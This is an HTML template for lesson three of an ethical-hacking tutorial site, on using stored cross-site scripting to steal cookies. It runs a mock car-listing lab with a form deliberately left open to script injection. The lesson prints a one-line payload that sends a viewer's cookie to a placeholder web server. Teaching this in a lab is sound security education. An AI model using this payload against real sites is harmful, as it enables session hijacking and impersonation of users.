
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="../../favicon.ico">

    <title>Vuln: Learn Ethical Hacking for free</title>

    <!-- Bootstrap core CSS -->
    <link href="../static/css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="../static/css/navbar-fixed-top.css" rel="stylesheet">
    <link href="../static/css/buttons.css" rel="stylesheet">

    <!-- JS -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
    <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/js/bootstrap.min.js"></script>
    <script src="jquery-3.1.0.min.js"></script>

    <!-- Custom Fonts -->
    <link href="https://fonts.googleapis.com/css?family=Arvo|Josefin+Slab|Lato:900|Open+Sans" rel="stylesheet">

        <!-- Glyphicons -->
        <link href="//netdna.bootstrapcdn.com/bootstrap/3.0.0/css/bootstrap-glyphicons.css" rel="stylesheet">

  </head>

  <body>

    <!-- Fixed navbar -->
    <nav class="navbar navbar-default navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="navbar-brand" href="/"><h5>Vuln</h5></a>
        </div>
        <div id="navbar" class="navbar-collapse collapse">
          <ul class="nav navbar-nav">
          </ul>
          <ul class="nav navbar-nav navbar-right">
            <li><a href="/lessons"><h7 style="color: #D3D3D3">Lessons</h7></a></li>
            <li><a href="/hub"><h7 style="color: #D3D3D3">Hub</h7></a></li>
            {% if user == None %}
            <li><a href="/login"><h7 style="color: #D3D3D3;">Login <span class="glyphicon glyphicon-log-in"></span></h7></a></li>
            {% else %}
            <li><a href="/logout_user"><h7 style="color: #D3D3D3">Logout <span class="glyphicon glyphicon-log-out"></span></h7></a></li>
            {% endif %}
          </ul>
        </div>
      </div>
    </nav>

    <!-- Header Landing  -->
      <div class="lessons">
        <div class="container-fluid" style="background-color: #3fb0ac; background-image: none">
          <div class="container">
            <div class="row">
              </div>
              <div class="row">
                <div class="col-6 col-sm-8">
                  <h8 style="color:#DFDCE3">XSS - Cross Site Scripting</h8>
                  <hr style="color:#DFDCE3;">
                  <h9 style="color:#DFDCE3;">&nbsp&nbsp&nbsp&nbsp Lesson Three - Cookie Stealing</h9>
                  <a class="ghost-button" style="position: absolute; top: 310px; left: 100px; text-decoration: none; color: white; font-weight: bolder" href="#down">Begin Lesson <span class="glyphicon glyphicon-circle-arrow-down"></span></a>
                </div>
            </div>
         </div>
        </div>
     </div>

<!-- https://www.youtube.com/watch?v=OVLz6RgOjIY -->
<!-- https://www.youtube.com/watch?v=486KmQOcwWg-->

<!-- Chrome->settings->advancedsettings-> content settings-> cookies-> all cookies and data -->
     <!-- Content -->
     <div id='down'><a name='down'></a></div>
     <div class="container-fluid" style="background-color: #DFDCE3; padding-top: 50px; padding-bottom: 20px;">
        <div class="col-md-12">
        <h1 style="color:#3fb0ac; font-family:'Lato', sans-serif; font-size: 50px; padding-bottom: 20px;">Lesson Introduction</h1>
            <p style="color: black; font-family:'Arvo', serif; font-size: 24px; padding-bottom: 100px">
              In the previous lessons we looked at the basics of XSS, in this tutorial we are going to expand on that and look at more practical XSS types of attacks that are more common for hackers to use and also more dangerous. in this lesson we'll specifically be looking at cookie stealing with XSS.
            </p>
          </div>

          <!-- HTML with styles -->
              <div class="col-md-12">
                <h1 style="color:#3fb0ac; font-family:'Lato', sans-serif; font-size: 50px; padding-bottom: 20px;">What is a Cookie?</h1>
                    <p style="color: black; font-family:'Arvo', serif; font-size: 24px; padding-bottom: 20px">
                      A cookie isn't the sweet delicious cookies that you and I know of, a cookie or more specifically a HTTP cookie is a small piece of data that is sent from a website and stored on the user's computer by the user's web browser and are a useful way of remembering information on that page so that the page will load faster, however there is one problem with this what happens if a hacker can gain access to your cookie.
                    </p>
                  </div>

                  <div class="col-md-12">
                      <h1 style="color:#3fb0ac; font-family:'Lato', sans-serif; font-size: 50px; padding-bottom: 20px;">What can attackers do with Cookies?</h1>
                          <p style="color: black; font-family:'Arvo', serif; font-size: 24px; padding-bottom: 20px">
                            Attackers can do many things with your cookies, firstly a cookie will hold your session data so an attacker can steal your session and impersonate you and even post things in your name, so say for instance you are on an e-commerce website and have posted a item that you are interested in selling an attacker can redirect the payment of that item to their bank so when you sell that item the money will get sent to an attacker's bank account, now this is only one example but a hacker can do many things with a victim's cookie, which is why it is such a dangerous exploit.
                          </p>
                        </div>

                        <div class="col-md-12">
                            <h1 style="color:#3fb0ac; font-family:'Lato', sans-serif; font-size: 50px; padding-bottom: 20px;">Example 3 - Cookie Stealing</h1>
                                <p style="color: black; font-family:'Arvo', serif; font-size: 24px; padding-bottom: 20px">
                                  So picture this scenario you are user for a car e-commerce website where you can buy and sell cars and the form that is used to post the car description is vulnerable to XSS attacks. So in this lesson you are tasked with inputting cookie stealing javascript code into a new car post so that when a user will view the post the injected code will run on their machine and then send you their cookie. So below we have all the car listing of a this car e-commerce website, so you can create a new car listing and see how it works, by filling in the form and clicking on the post listing button.
                                </p>
                              </div>

      <h1 style=" color black; font-family:'Lato', sans-serif; font-size: 30px; padding-bottom: 20px;">Car Listings</h1>
      <button class="btn btn-info" data-toggle="collapse" data-target="#car1">Audi Q7 3.0TDI S</button>
      <div id="car1" class="collapse">
          Price - £100,000
        </div>
      <br>
      <br>
      <button class="btn btn-info" data-toggle="collapse" data-target="#car2">Mk4 Golf R32</button>
      <div id="car2" class="collapse">
          Price - £2000
        </div>
      <br>
      <br>
      <button class="btn btn-info" data-toggle="collapse" data-target="#car3">Vauxhall corsa breeze</button>
      <div id="car3" class="collapse">
        Price - £500
        </div>
      <br>

      {% if car_name != None %}
      <br>
      <button class="btn btn-info" data-toggle="collapse" data-target="#car4">{{ car_name }}</button>
      <div id="car4" class="collapse">
          {{ car_description }}
        </div>
      <br>
      {% endif %}

      <h1 style=" color black; font-family:'Lato', sans-serif; font-size: 30px; padding-bottom: 20px;">Form</h1>
          <form action="/xss_lesson_3_test" method="post" form style="padding-bottom: 20px;">
            <div class="form-group">
                <input class="form-control" type="text" placeholder="Car Name..." name="name" required>
              </div>
            <div class="form-group">
              <textarea class="form-control" rows="5" name="des" placeholder="Car Description..." required></textarea>
            </div>
          <button type="submit" class="btn btn-primary">Post Listing</button>
      </form>

      <div class="col-md-12">
        <h1 style="color:#3fb0ac; font-family:'Lato', sans-serif; font-size: 50px; padding-bottom: 20px;">Lets Break it</h1>
            <p style="color: black; font-family:'Arvo', serif; font-size: 24px; padding-bottom: 20px">
              Okay so after playing around with it you see that when you create a post it makes a new listing on the car listings part, now to inject malicious XSS code into the button we will first use a document location parameter this is where the cookie will be sent to so in this case you can do an IP for instance. and then you add the cookie to the end of it. How this works is the victim will open your listing on there machine which has the cookie stored and then their stored cookie will be sent to that webserver. The code below is how you will implement this attack.
            </p>
          </div>

                    <!-- code -->
                    <h1 style=" color black; font-family:'Lato', sans-serif; font-size: 30px; padding-bottom: 20px;">Code</h1>
                    <pre><code>&lt;script&gt;document.location='http://webservername/c='+document.cookie;&lt;/script&gt;</code></pre>
                  </div>

      <!-- Next lesson button -->
         <form action="/xss_lesson4">
          <button style="width:100%; border-radius: 24px; background-color: #3fb0ac !important" type="register" class="btn"><h7>Next Lesson</h7></button>
        </form>

              
      






     </div>


    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <script>window.jQuery || document.write('<script src="../../assets/js/vendor/jquery.min.js"><\/script>')</script>
    <script src="../../dist/js/bootstrap.min.js"></script>
    <!-- IE10 viewport hack for Surface/desktop Windows 8 bug -->
    <script src="../../assets/js/ie10-viewport-bug-workaround.js"></script>
  </body>
</html>

<!-- https://www.youtube.com/watch?v=xpsDfptLCKM-->
<!-- https://stackoverflow.com/questions/601300/what-is-sql-injection-->
<!--https://www.w3schools.com/sql/sql_injection.asp-->
